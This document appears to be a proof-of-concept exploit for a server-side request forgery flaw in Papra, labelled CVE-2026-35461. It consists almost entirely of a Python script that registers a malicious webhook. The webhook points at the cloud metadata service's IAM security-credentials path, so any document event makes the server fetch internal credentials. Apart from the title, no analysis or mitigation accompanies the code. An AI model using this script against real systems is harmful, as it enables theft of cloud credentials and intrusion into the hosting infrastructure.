CVE-2026-35461 Papra SSRF漏洞

import requests # Target URL of the Papra instance target_url = "http://target-papra-instance.com/api/webhooks" # Attacker's session cookie (obtained after authentication) cookies = { "session": "authenticated_session_cookie_here" } # Malicious payload pointing to internal metadata service or localhost internal_target = "http://169.254.169.254/latest/meta-data/iam/security-credentials/" # Data to register the malicious webhook webhook_data = { "url": internal_target, "events": ["document.created"] } try: # Send request to register the webhook response = requests.post(target_url, json=webhook_data, cookies=cookies) if response.status_code == 200: print("[+] Malicious webhook registered successfully.") print("[+] Trigger a document event to force the server to send a request to:", internal_target) else: print("[-] Failed to register webhook.") print("Status code:", response.status_code) print("Response:", response.text) except Exception as e: print("Error:", e)